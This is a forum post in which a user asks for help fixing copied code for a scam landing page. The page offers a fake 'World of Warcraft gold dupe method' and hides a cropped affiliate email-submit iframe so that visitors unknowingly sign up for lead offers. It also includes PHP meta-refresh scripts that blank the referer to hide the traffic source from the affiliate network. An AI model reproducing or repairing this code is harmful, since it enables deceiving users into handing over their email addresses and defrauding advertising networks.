lagrimas175
Regular Member
- Sep 4, 2009
- 277
- 454
I got this code from wowhaxor's guide and copied it line by line. Yet, it isn't working. If you go to
you will see that it keeps repeating itself and doesn't show the iframed e-mail submit part.
index.php:
metarefresh1.php:
metarefresh2.php:
Note, I replaced affiliate link with blackhatworld.com for now.
It just keeps repeating itself in that section of the page and doesn't show the iframed part. How can I fix this?
HTML:
http://www.bakiworld.com/
index.php:
Code:
<html>
<head>
<title>World of Warcraft Working Dupe Method</title>
<style type="text/css">
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000000;
}
#outteriframe {
width:350px;
height:50px;
overflow:hidden;
position:relative;
margin-left: auto;
margin-right: auto;
}
#inneriframe {
position:absolute;
top:-309px;
left:-360px;
width:1280px;
height:1200px;
}
</style>
</head>
<body bgcolor="#BFC5C5?>
<Center>Get the Working WoW Gold/Item Dupe Method Now, For
Free!</center><br>
<table border="2? cellpadding="1? cellspacing="0?>
<tr><td><center>In order to prevent Blizzard from getting and fixing this
method we manually e-mail it to all interested persons. Please input
your valid e-mail address below and click submit in order to get your
copy of this wow dupe method. **NOTE: If you cannot see the e-mail
field please reload the page in FireFox/Safari**</center><br></td>
<td>Get Your WoW Dupe Method Here!<td>
</tr>
<tr>
<td><center>Email Address:</center></td>
<td></div>
<div id="outteriframe"><iframe
src="http://www.bakiworld.com/metarefresh1.php" scrolling="no"
id="inneriframe"></iframe></div></td>
<div style="overflow: hidden; width: 481px; height: 90px; position: relative;" id="i_div"><iframe name="i_frame" src="http://www.incentaclick.com/click/r9d320d510/" style="border: 0pt none ; left: -443px; top: -521px; position: absolute; width: 1366px; height: 637px;" scrolling="no"></iframe></div>
</tr>
</table>
</div>
</body>
</html>
metarefresh1.php:
Code:
<?php
echo "<meta http-equiv=\"refresh\" content=\"0;url=http://bakiworld.com/refresh2.php\">";
}
?>
metarefresh2.php:
Note, I replaced affiliate link with blackhatworld.com for now.
Code:
<?php
$referer = $_SERVER['HTTP_REFERER'];
if($referer == "")
{
echo "<meta http-equiv=\"refresh\" content=\"0;url=http://www.blackhatworld.com/\">";
}
?>
It just keeps repeating itself in that section of the page and doesn't show the iframed part. How can I fix this?
Last edited: